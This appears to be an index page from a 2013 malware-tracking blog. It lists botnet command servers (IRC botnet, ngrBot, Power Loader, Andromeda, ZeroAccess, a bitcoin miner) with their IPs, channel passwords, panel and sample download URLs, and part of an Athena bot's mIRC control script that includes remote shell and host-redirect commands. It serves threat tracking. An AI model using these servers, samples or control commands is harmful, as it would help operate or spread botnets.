Author: Pig

were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

By Pig, May 6, 2013
Uncategorized

Thanks to anonymous guy in this post for the sample Resolved : [were.hacked.jp] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {x00-00-DEU-XP-DELL-9640}Channel: ###x00### (Password: )Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x sample here hosting infos: http://whois.domaintools.com/176.31.123.56

f.eastmoon.pl(ngrBot hosted in Germany Karlsruhe 1&1 Internet Ag)

By Pig, April 29, 2013
Uncategorized

Resolved : [f.eastmoon.pl] To [217.160.173.154]Resolved : [f.eastmoon.pl] To [74.208.230.53] Resolved : [f.eastmoon.pl] To [188.138.89.106]Resolved : [f.eastmoon.pl] To [85.25.86.198]Resolved : [f.eastmoon.pl] To [213.165.71.238] Server: 213.165.71.238:9000Server Password:Username: cemomcbNickname: n{DEU-XPx86a}rxibehmdChannel: #sp (Password: yap)Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Server: 188.138.89.106:9000Server Password:Username: pqellooNickname: {DEU-XPx86a}pqelloovChannel: #sp (Password: yap)Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Samples: hxxp://hotfile.com/dl/206650590/b80e8ea/spieoaiuasf.html hxxp://199.7.177.236/dl/206565430/6f9ee70/we71fw1fe6320.html Thanx to aLiSs for samples and for finding this net hosting infos:Read more...

Power Loader(http malware hosted in Luxembourg Steinsel Root Sa)

By Pig, April 29, 2013
Uncategorized

HTTP Requests: hxxp://94.242.250.178/daol/asidfk11.dat?wv=51&bt=32 hxxp://94.242.250.178/daol/oadl.php hxxp://wickedreport.com/images/2009/05/naughty-elephant.jpg Sample: hxxp://tbsnpd.best.volyn.ua/dlimage11.php hxxp://94.242.250.178/daol/asidfk11.dat Hosting infos: http://whois.domaintools.com/94.242.250.178

btcguild.com(Bitcoin Miner botnet hosted in United States Dallas Ebl Global Networks Inc.)

By Pig, April 29, 2013
Uncategorized

URL: hxxp://btcguild.com:8332/   hxxp://btcguild.com:8332 -u chakan_1 -p 123 hxxp://btcguild.com:8332 -u graskla_1 -p 123 DATA: POST / HTTP/1.1 Authorization: Basic Y2hha2FuXzE6MTIz Content-Length: 43 User-Agent: Ufasoft bitcoin-miner/0.20 (Windows NT XP 5.1.2600 Service Pack 3) Host: btcguild.com:8332 Cache-Control: no-cache {“method”: “getwork”, “params”: [], “id”:0} Actions Detected: Creates autorun records Injects code into other processes Patches system files Samples:Read more...

199.168.136.116(Andromeda hosted in United States Scranton Volumedrive)

By Pig, April 25, 2013
Uncategorized

Panel:hxxp://199.168.136.116/andro/image.php Plugins: hxxp://199.168.136.116/andro/r.pack hxxp://199.168.136.116/andro/s.pack hxxp://199.168.136.116/andro/f.pack Andromeda path need user and login :hxxp://199.168.136.116/andro/ Other: http://199.168.136.116/andro/fg.php?id=1880376902 sample:hxxp://199.168.136.116/andro/and.exe hosting infos: http://whois.domaintools.com/199.168.136.116

xlotxdxtorwfmvuzfuvtspel.com(zeroaccess hosted in United States San Antonio Rackspace Cloud Servers)

By Pig, April 23, 2013
Uncategorized

Domain used: xlotxdxtorwfmvuzfuvtspel.com    166.78.144.80 C:WINDOWSsystem32rsaenh.dll systemroot C:RECYCLER C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004 C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004$e0da97a6dd053ef45a7e44d9077fa7d5 L U @ n ACPI#PNP0303#2&da1a3ff&0 d2cd4bfe C:RECYCLERS-1-5-18 C:RECYCLERS-1-5-18$e0da97a6dd053ef45a7e44d9077fa7d5 C:DOCUME~1UserLOCALS~1Temp1 (1).exe PIPEwkssvc C: sample here hosting infos: http://whois.domaintools.com/166.78.144.80

Athena mIRC Script

By Pig, April 14, 2013
Uncategorized

Used by Athena customers for controling the bot via IRC ;Athena mIRC Script menu channel { - Athena .- .Misc ..Version:/msg $active !version ..Info:/msg $active !info ..Shell:{ %AthenaVar = $$?="Command:" msg $active !shell %AthenaVar } ..- ..Block Host:{ %AthenaVar = $$?="Host:" msg $active !http.block %AthenaVar } ..Redirect Host:{ %AthenaVar1 = $$?="Original Host:" %AthenaVar2 = $$?="RedirectRead more...